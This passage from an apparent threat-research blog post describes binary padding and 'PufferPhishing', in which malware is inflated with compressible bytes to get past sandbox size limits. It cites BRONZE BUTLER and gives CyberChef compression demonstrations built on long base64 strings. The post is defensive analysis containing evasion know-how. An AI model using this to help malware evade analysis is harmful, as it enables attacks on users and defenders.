&lt;a href="#binary-padding-for-obfuscation" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Padding, such as junk code, can be added to an executable solely for the
purpose of creating so much junk and noise that it bogs down analysts when
looking at the file, that it has the effect of obfuscating the relevant
malicious code. Many would be familiar with the technique used in legislation
of a &lt;a href="https://en.wikipedia.org/wiki/Rider_%28legislation%29"target="_blank" rel="noopener"&gt;rider&lt;/a&gt;; an extra
provision added to a bill, hiding behind the main body of text hoping to fly
under the radar in order not to be noticed. It is a similar concept with junk
code obfuscation. Junk code has the effect of hindering manual analysis by a
reverse engineer that does not have the tools or skills to avoid falling into
the trap. While this is effective at hindering manual analysis, it does not
always have the ability to pass automated analysis tools as they can analyze
code at volumes that cannot be performed by a human. The presence of junk code
in itself can be a suspicious indicator of maliciousness; what can be less
discreet than a malware containing the works of Shakespeare inside it?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Binary Padding for Obfuscation&lt;/strong&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Pros for the attacker&lt;/th&gt;
&lt;th&gt;Cons for the attacker&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Can confuse malware analysts&lt;/td&gt;
&lt;td&gt;Can be a suspicious indicator in itself&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hinders debugging&lt;/td&gt;
&lt;td&gt;Can cause more resource consumption, hindering the performance of the malware&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Has some of the same positive effects of inflating the binary size&lt;/td&gt;
&lt;td&gt;Limited effectiveness on skilled analysts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Can cause false negatives&lt;/td&gt;
&lt;td&gt;Has the same negative effects of inflating the binary size&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Can cause decompilers and disassemblers to take a very long time to open the file – Less likely to defeat automated analysis techniques&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;Problem for Threat Actors&lt;span class="hx:absolute hx:-mt-20" id="problem-for-threat-actors"&gt;&lt;/span&gt;
&lt;a href="#problem-for-threat-actors" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The main problem for threat actors is that with binary padding, the increased
file size can be hard to distribute. Threat actors want a file that is huge on
disk, but does not take ages to deliver. Not everyone has an extremely fast
internet, and therefore it would be inconvenient to a threat actor wishing to
distribute malware to make it take hours to download.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/05/how-hackers-use-binary-padding-to-outsmart-sandboxes/images/fig2.jpg" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;What is their solution to this? The malware author can use a downloader that
dynamically pads a binary after downloading it. An example of this is the
threat group BRONZE BUTLER. BRONZE BUTLER
&lt;a href="https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"target="_blank" rel="noopener"&gt;targeted Japanese businesses&lt;/a&gt;
with malware using padding. This was achieved by using a downloader that would
download a payload and then insert the character ‘0’ at the end of the file to
inflate the size to 50-100 MB.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/05/how-hackers-use-binary-padding-to-outsmart-sandboxes/images/fig3.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;This comes with extra baggage that the malware author might not wish to have.
Firstly the downloader itself might be detected, which can defeat the purpose
of using binary padding to avoid detection. Next is also that it creates more
network traffic that might be detected. The C2 might already be known to
distribute malware, and it can be blocked or detected at this point. The use of
a C2 can add an extra single point of failure in the chain where something
might break. Also the payload that is fetched might be detected in memory or
over the network before the padding is performed, so it might be analyzed
before the padding has a chance to take effect.&lt;/p&gt;
&lt;p&gt;There is another way to achieve padding without the same baggage that comes
from using downloaders and C2 servers, &lt;strong&gt;exploiting compression&lt;/strong&gt;. We will talk
about this technique below, which we are calling “&lt;strong&gt;PufferPhishing&lt;/strong&gt;” due to
its active use in malicious phishing attachments. This is not a new technique,
but is ever more being exploited by threat actors in phishing campaigns.&lt;/p&gt;
&lt;h2&gt;PufferPhishing: Binary Padding Combined with Compression&lt;span class="hx:absolute hx:-mt-20" id="pufferphishing-binary-padding-combined-with-compression"&gt;&lt;/span&gt;
&lt;a href="#pufferphishing-binary-padding-combined-with-compression" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Recently we have noticed an uptick in the use of binary padding to evade
analysis size limits… but with a smart technique to ensure that the files are
still deliverable, by exploiting the efficiency of compression algorithms.
Malware authors are creating padding that uses resources and overlays in order
to create malware that is hundreds of MBs in size, but is able to compress to
over 90% of its original bulk due to its efficiency in compression. This means
that malware can be created to circumvent sandbox size limits but also solve
the file transport problem that comes with that technique. It is the binary
padding equivalent of having your cake and eating it too!&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/05/how-hackers-use-binary-padding-to-outsmart-sandboxes/images/fig4.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;h3&gt;How Does the PufferPhishing Technique Work?&lt;span class="hx:absolute hx:-mt-20" id="how-does-the-pufferphishing-technique-work"&gt;&lt;/span&gt;
&lt;a href="#how-does-the-pufferphishing-technique-work" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The technique works by using repeating sequences of bytes padded inside
binaries to inflate the size of the binary. But the nature of the repeating
bytes used allows it to be compressed to over 90% of its original size,
commonly in the
&lt;a href="https://en.wikipedia.org/wiki/ZIP_%28file_format%29#:~:text=ZIP%20is%20an%20archive%20file,DEFLATE%20is%20the%20most%20common."target="_blank" rel="noopener"&gt;ZIP file format&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;ZIP archive file format most commonly uses the
&lt;a href="https://www.zlib.net/feldspar.html"target="_blank" rel="noopener"&gt;DEFLATE compression&lt;/a&gt; format, incorporating
LZ77 and Huffman coding. It is very good at compressing sequences of repeating
data. DEFLATE compression works so well on repeating bytes that it’s worth
showing an example:&lt;/p&gt;
&lt;p&gt;Creating a file of size 5 KB, with the repeating character &lt;code&gt;a&lt;/code&gt; will compress to
22 bytes with DEFLATE. A 99.56% decrease in size. Whereas a file with the
string below will only compress to 45 bytes:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;This is a 13.46% decrease in size. Through DEFLATE, the file with the repeating
bytes will be smaller than the file with less repeating bytes even though the
former file was around 100x bigger decompressed! This shows how the use of
repeating data (or a very low
&lt;a href="https://en.wikipedia.org/wiki/Entropy_%28information_theory%29"target="_blank" rel="noopener"&gt;entropy&lt;/a&gt;) can be
exploited to make very large malware files that are easy to transport. The
following CyberChef recipes have been created to help demonstrate:&lt;/p&gt;
&lt;p&gt;File 1 (Repeating Bytes/Large File):
&lt;a href="https://gchq.github.io/CyberChef/#recipe=Raw_Deflate%28%27Dynamic%20Huffman%20Coding%27%29&amp;amp;input=YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWE"target="_blank" rel="noopener"&gt;Compression&lt;/a&gt;,
&lt;a href="https://gchq.github.io/CyberChef/#recipe=Entropy%28%27Shannon%20scale%27%29&amp;amp;input=YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWF